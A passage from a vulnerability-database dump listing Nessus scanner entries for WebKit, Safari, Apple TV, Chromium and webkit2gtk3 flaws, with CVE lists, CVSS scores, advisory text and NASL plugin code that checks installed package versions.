value:\"http://www.nessus.org/u?071f4a9f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:webkit2-gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"webkit2-gtk3<2.16.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:48", "description": "Versions of Safari prior to 10.1.1 are affected by multiple vulnerabilities :\n\n - A flaw exists that is triggered as certain input is not properly validated. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code.\n - A use-after-free error exists in the handling of RenderElement objects. With a specially crafted web page, a context-dependent attacker can dereference already freed memory and potentially execute arbitrary code.\n - A use-after-free error exists in the handling of RenderLayer objects. With a specially crafted web page, a context-dependent attacker can dereference already freed memory and potentially execute arbitrary code.\n - A use-after-free error exists in the handling of RenderInline objects. With a specially crafted web page, a context-dependent attacker can dereference already freed memory and potentially execute arbitrary code.\n - An unspecified flaw exists in the Safari history menu. 
With a specially crafted web page, a context-dependent attacker can cause an application denial of service.\n - A flaw exists related to an inconsistent user interface. This may allow a context-dependent attacker to spoof the address bar.\n - A logic flaw exists that allows a UXSS attack. The issue is triggered when handling container nodes. This may allow a context-dependent attacker to create a specially crafted web page that will execute arbitrary script code in a user's browser session within the trust relationship between their browser and any website.\n - A flaw exists related to an inconsistent user interface. This may allow a context-dependent attacker to spoof the address bar.\n\nThis product is also affected by vulnerabilities found in the following components:\n\n - WebKit \n - Web Inspector", "cvss3": {"score": 5.6, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2017-05-18T00:00:00", "type": "nessus", "title": "Safari < 10.1.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2499", "CVE-2017-2504", "CVE-2017-2505", "CVE-2017-2515", "CVE-2017-2521", "CVE-2017-2525", "CVE-2017-2530", "CVE-2017-2531", "CVE-2017-2536", "CVE-2017-2549", "CVE-2017-6980", "CVE-2017-6984", "CVE-2017-2496", "CVE-2017-2510", "CVE-2017-2539", "CVE-2017-2538", "CVE-2017-2495", "CVE-2017-2500", "CVE-2017-2506", "CVE-2017-2508", "CVE-2017-2511", "CVE-2017-2514", "CVE-2017-2526", "CVE-2017-2528", "CVE-2017-2547"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*"], "id": "700117.PRM", "href": "https://www.tenable.com/plugins/nnm/700117", "sourceData": "Binary data 700117.prm", "cvss": {"score": 6.8, "vector": "CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T01:09:36", "description": "According to its banner, the version of Apple TV on the remote device is prior to 10.2.1. 
It is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption issue exists in the WebKit Web Inspector component that allows an unauthenticated, remote attacker to execute arbitrary code.\n (CVE-2017-2499)\n\n - An unspecified race condition exists in the Kernel component that allows a local attacker to execute arbitrary code with kernel-level privileges.\n (CVE-2017-2501)\n\n - An information disclosure vulnerability exists in the CoreAudio component due to improper sanitization of certain input. A local attacker can exploit this to read the contents of restricted memory. (CVE-2017-2502)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit due to a logic flaw when handling WebKit Editor commands. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary script code in a user's browser session. (CVE-2017-2504)\n\n - Multiple memory corruption issues exist in WebKit due to improper validation of certain input. An unauthenticated, remote attacker can exploit these to execute arbitrary code. (CVE-2017-2505, CVE-2017-2515, CVE-2017-2521, CVE-2017-2530, CVE-2017-2531, CVE-2017-6980, CVE-2017-6984)\n\n - Multiple information disclosure vulnerabilities exist in the Kernel component due to improper sanitization of certain input. A local attacker can exploit these to read the contents of restricted memory. (CVE-2017-2507, CVE-2017-6987)\n\n - A use-after-free error exists in the SQLite component when handling SQL queries. An unauthenticated, remote attacker can exploit this to deference already freed memory, resulting in the execution of arbitrary code.\n (CVE-2017-2513)\n\n - Multiple buffer overflow conditions exist in the SQLite component due to the improper validation of certain input. An unauthenticated, remote attacker can exploit these, via a specially crafted SQL query, to execute arbitrary code. 
(CVE-2017-2518, CVE-2017-2520)\n\n - A memory corruption issue exists in the SQLite component when handling SQL queries. An unauthenticated, remote attacker can exploit this, via a specially crafted query, to execute arbitrary code. (CVE-2017-2519)\n\n - An unspecified memory corruption issue exists in the TextInput component when parsing specially crafted data.\n An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-2524)\n\n - A use-after-free error exists in WebKit when handling RenderLayer objects. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to deference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2525)\n\n - Multiple unspecified flaws exist in WebKit that allow an unauthenticated, remote attacker to corrupt memory and execute arbitrary code by using specially crafted web content. (CVE-2017-2536)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit due to a logic error when handling frame loading. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary code in a user's browser session.\n (CVE-2017-2549)\n\n - An unspecified flaw exists in the IOSurface component that allows a local attacker to corrupt memory and execute arbitrary code with kernel-level privileges.\n (CVE-2017-6979)\n\n - An unspecified flaw exists in the AVEVideoEncoder component that allows a local attacker, via a specially crafted application, to corrupt memory and execute arbitrary code with kernel-level privileges.\n (CVE-2017-6989)\n\n - A denial of service vulnerability exists in the CoreText component due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to crash an application. (CVE-2017-7003)\n\n - A memory corruption issue exists in the JavaScriptCore component due to improper validation of user-supplied input. 
An unauthenticated, remote attacker can exploit this, via specially crafted web content, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-7005)\n\nNote that only 4th generation models are affected by these vulnerabilities.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-05-17T00:00:00", "type": "nessus", "title": "Apple TV < 10.2.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2499", "CVE-2017-2501", "CVE-2017-2502", "CVE-2017-2504", "CVE-2017-2505", "CVE-2017-2507", "CVE-2017-2513", "CVE-2017-2515", "CVE-2017-2518", "CVE-2017-2519", "CVE-2017-2520", "CVE-2017-2521", "CVE-2017-2524", "CVE-2017-2525", "CVE-2017-2530", "CVE-2017-2531", "CVE-2017-2536", "CVE-2017-2549", "CVE-2017-6979", "CVE-2017-6980", "CVE-2017-6984", "CVE-2017-6987", "CVE-2017-6989", "CVE-2017-7003", "CVE-2017-7005"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_10_2_1.NASL", "href": "https://www.tenable.com/plugins/nessus/100256", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100256);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-2499\",\n \"CVE-2017-2501\",\n \"CVE-2017-2502\",\n \"CVE-2017-2504\",\n \"CVE-2017-2505\",\n \"CVE-2017-2507\",\n \"CVE-2017-2513\",\n \"CVE-2017-2515\",\n \"CVE-2017-2518\",\n \"CVE-2017-2519\",\n \"CVE-2017-2520\",\n \"CVE-2017-2521\",\n \"CVE-2017-2524\",\n \"CVE-2017-2525\",\n \"CVE-2017-2530\",\n \"CVE-2017-2531\",\n \"CVE-2017-2536\",\n \"CVE-2017-2549\",\n \"CVE-2017-6979\",\n \"CVE-2017-6980\",\n \"CVE-2017-6984\",\n \"CVE-2017-6987\",\n \"CVE-2017-6989\",\n \"CVE-2017-7003\",\n \"CVE-2017-7005\"\n );\n script_bugtraq_id(\n 98454,\n 98455,\n 98456,\n 98457,\n 98468,\n 98473\n );\n\n script_name(english:\"Apple TV < 10.2.1 Multiple Vulnerabilities\");\n 
script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 10.2.1. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A memory corruption issue exists in the WebKit Web\n Inspector component that allows an unauthenticated,\n remote attacker to execute arbitrary code.\n (CVE-2017-2499)\n\n - An unspecified race condition exists in the Kernel\n component that allows a local attacker to execute\n arbitrary code with kernel-level privileges.\n (CVE-2017-2501)\n\n - An information disclosure vulnerability exists in the\n CoreAudio component due to improper sanitization of\n certain input. A local attacker can exploit this to read\n the contents of restricted memory. (CVE-2017-2502)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit due to a logic flaw when handling\n WebKit Editor commands. An unauthenticated, remote\n attacker can exploit this, via a specially crafted web\n page, to execute arbitrary script code in a user's\n browser session. (CVE-2017-2504)\n\n - Multiple memory corruption issues exist in WebKit due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit these to\n execute arbitrary code. (CVE-2017-2505, CVE-2017-2515,\n CVE-2017-2521, CVE-2017-2530, CVE-2017-2531,\n CVE-2017-6980, CVE-2017-6984)\n\n - Multiple information disclosure vulnerabilities exist\n in the Kernel component due to improper sanitization of\n certain input. A local attacker can exploit these to\n read the contents of restricted memory. (CVE-2017-2507,\n CVE-2017-6987)\n\n - A use-after-free error exists in the SQLite component\n when handling SQL queries. 
An unauthenticated, remote\n attacker can exploit this to deference already freed\n memory, resulting in the execution of arbitrary code.\n (CVE-2017-2513)\n\n - Multiple buffer overflow conditions exist in the SQLite\n component due to the improper validation of certain\n input. An unauthenticated, remote attacker can exploit\n these, via a specially crafted SQL query, to execute\n arbitrary code. (CVE-2017-2518, CVE-2017-2520)\n\n - A memory corruption issue exists in the SQLite component\n when handling SQL queries. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n query, to execute arbitrary code. (CVE-2017-2519)\n\n - An unspecified memory corruption issue exists in the\n TextInput component when parsing specially crafted data.\n An unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2017-2524)\n\n - A use-after-free error exists in WebKit when handling\n RenderLayer objects. An unauthenticated, remote attacker\n can exploit this, via a specially crafted web page, to\n deference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2525)\n\n - Multiple unspecified flaws exist in WebKit that allow\n an unauthenticated, remote attacker to corrupt memory\n and execute arbitrary code by using specially crafted\n web content. (CVE-2017-2536)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit due to a logic error when handling\n frame loading. 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 70.0.3538.67\"), vulnerable:make_list(\"lt 70.0.3538.67\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:55:25", "description": "The remote host is affected by the vulnerability described in GLSA-201909-05 (WebkitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebkitGTK+. 
Please review the CVE identifiers referenced below for details.\n Impact :\n\n An attacker, by enticing a user to visit maliciously crafted web content, may be able to execute arbitrary code or cause memory corruption.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-09-09T00:00:00", "type": "nessus", "title": "GLSA-201909-05 : WebkitGTK+: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11070", "CVE-2019-6201", "CVE-2019-6251", "CVE-2019-7285", "CVE-2019-7292", "CVE-2019-8503", "CVE-2019-8506", "CVE-2019-8515", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8595", "CVE-2019-8607", "CVE-2019-8615", "CVE-2019-8644", "CVE-2019-8649", "CVE-2019-8658", "CVE-2019-8666", "CVE-2019-8669", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8678", "CVE-2019-8679", "CVE-2019-8680", "CVE-2019-8681", "CVE-2019-8683", "CVE-2019-8684", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8688", "CVE-2019-8689", "CVE-2019-8690"], "modified": "2022-05-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:webkit-gtk", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201909-05.NASL", "href": "https://www.tenable.com/plugins/nessus/128594", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201909-05.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128594);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/06\");\n\n script_cve_id(\"CVE-2019-11070\", \"CVE-2019-6201\", \"CVE-2019-6251\", \"CVE-2019-7285\", \"CVE-2019-7292\", \"CVE-2019-8503\", \"CVE-2019-8506\", \"CVE-2019-8515\", \"CVE-2019-8518\", \"CVE-2019-8523\", \"CVE-2019-8524\", \"CVE-2019-8535\", \"CVE-2019-8536\", \"CVE-2019-8544\", \"CVE-2019-8551\", \"CVE-2019-8558\", \"CVE-2019-8559\", \"CVE-2019-8563\", \"CVE-2019-8595\", \"CVE-2019-8607\", \"CVE-2019-8615\", \"CVE-2019-8644\", \"CVE-2019-8649\", \"CVE-2019-8658\", \"CVE-2019-8666\", \"CVE-2019-8669\", \"CVE-2019-8671\", \"CVE-2019-8672\", \"CVE-2019-8673\", \"CVE-2019-8676\", \"CVE-2019-8677\", \"CVE-2019-8678\", \"CVE-2019-8679\", \"CVE-2019-8680\", \"CVE-2019-8681\", \"CVE-2019-8683\", \"CVE-2019-8684\", \"CVE-2019-8686\", \"CVE-2019-8687\", \"CVE-2019-8688\", \"CVE-2019-8689\", \"CVE-2019-8690\");\n script_xref(name:\"GLSA\", value:\"201909-05\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"GLSA-201909-05 : WebkitGTK+: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-201909-05\n(WebkitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebkitGTK+. 
Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n An attacker, by enticing a user to visit maliciously crafted web\n content, may be able to execute arbitrary code or cause memory\n corruption.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2019-0002.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2019-0004.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201909-05\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All WebkitGTK+ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-libs/webkit-gtk-2.24.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8689\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:webkit-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/09\");\n script_set_attribute(attribute:\"generated_plugin\", 
value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-libs/webkit-gtk\", unaffected:make_list(\"ge 2.24.4\"), vulnerable:make_list(\"lt 2.24.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"WebkitGTK+\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T15:56:07", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\nCVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs (boo#1101999)\n\nCVE-2017-13884: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-13885: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-7153: An unspecified issue allowed remote 
attackers to spoof user-interface information (about whether the entire content is derived from a valid TLS session) via a crafted website that sends a 401 Unauthorized redirect (bsc#1077535).\n\nCVE-2017-7160: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-7161: An unspecified issue allowed remote attackers to execute arbitrary code via special characters that trigger command injection (bsc#1075775, bsc#1077535).\n\nCVE-2017-7165: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4088: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4096: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4200: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers a WebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n\nCVE-2018-4204: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1092279).\n\nCVE-2018-4101: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4113: An issue in the JavaScriptCore function in the 'WebKit' component allowed attackers to trigger an assertion failure by leveraging improper array indexing 
(bsc#1088182)\n\nCVE-2018-4114: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4117: An unspecified issue allowed remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted website (bsc#1088182, bsc#1102530).\n\nCVE-2018-4118: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4119: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4120: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4121: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1092278).\n\nCVE-2018-4122: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4125: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4127: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4128: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4129: An 
unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4146: An unspecified issue allowed attackers to cause a denial of service (memory corruption) via a crafted website (bsc#1088182).\n\nCVE-2018-4161: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4162: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4163: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4165: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4190: An unspecified issue allowed remote attackers to obtain sensitive credential information that is transmitted during a CSS mask-image fetch (bsc#1097693)\n\nCVE-2018-4199: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a crafted website (bsc#1097693)\n\nCVE-2018-4218: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers an @generatorState use-after-free (bsc#1097693)\n\nCVE-2018-4222: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation (bsc#1097693)\n\nCVE-2018-4232: An unspecified issue allowed remote 
attackers to overwrite cookies via a crafted website (bsc#1097693)\n\nCVE-2018-4233: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1097693)\n\nCVE-2018-4246: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages type confusion (bsc#1104169)\n\nCVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL mishandled an unset pageURL, leading to an application crash (bsc#1095611)\n\nCVE-2018-4133: A Safari cross-site scripting (XSS) vulnerability allowed remote attackers to inject arbitrary web script or HTML via a crafted URL (bsc#1088182).\n\nCVE-2018-11713: The libsoup network backend of WebKit unexpectedly failed to use system proxy settings for WebSocket connections. As a result, users could be deanonymized by crafted websites via a WebSocket connection (bsc#1096060).\n\nCVE-2018-11712: The libsoup network backend of WebKit failed to perform TLS certificate verification for WebSocket connections (bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues: Fixed a crash when atk_object_ref_state_set is called on an AtkObject that's being destroyed (bsc#1088932).\n\nFixed crash when using Wayland with QXL/virtio (bsc#1079512)\n\nDisable Gigacage if mmap fails to allocate in Linux.\n\nAdd user agent quirk for paypal website.\n\nProperly detect compiler flags, needed libs, and fallbacks for usage of 64-bit atomic operations.\n\nFix a network process crash when trying to get cookies of about:blank page.\n\nFix UI process crash when closing the window under Wayland.\n\nFix several crashes and rendering issues.\n\nDo TLS error checking on GTlsConnection::accept-certificate to finish the load earlier in case of errors.\n\nProperly close the connection to the nested wayland compositor in the Web Process.\n\nAvoid painting backing stores for 
zero-opacity layers.\n\nFix downloads started by context menu failing in some websites due to missing user agent HTTP header.\n\nFix video unpause when GStreamerGL is disabled.\n\nFix several GObject introspection annotations.\n\nUpdate user agent quirks to fix Outlook.com and Chase.com.\n\nFix several crashes and rendering issues.\n\nImprove error message when Gigacage cannot allocate virtual memory.\n\nAdd missing WebKitWebProcessEnumTypes.h to webkit-web-extension.h.\n\nImprove web process memory monitor thresholds.\n\nFix a web process crash when the web view is created and destroyed quickly.\n\nFix a network process crash when load is cancelled while searching for stored HTTP auth credentials.\n\nFix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and ENABLE_XSLT are disabled.\n\nNew API to retrieve and delete cookies with WebKitCookieManager.\n\nNew web process API to detect when form is submitted via JavaScript.\n\nSeveral improvements and fixes in the touch/gestures support.\n\nSupport for the “system” CSS font family.\n\nComplex text rendering improvements and fixes.\n\nMore complete and spec compliant WebDriver implementation.\n\nEnsure DNS prefetching cannot be re-enabled if disabled by settings.\n\nFix seek sometimes not working.\n\nFix rendering of emojis that were using the wrong scale factor in some cases.\n\nFix rendering of combining enclosed keycap.\n\nFix rendering scale of some layers in HiDPI.\n\nFix a crash in Wayland when closing the web view.\n\nFix crashes upower crashes when running inside a chroot or on systems with broken dbus/upower.\n\nFix memory leaks in GStreamer media backend when using GStreamer 1.14.\n\nFix 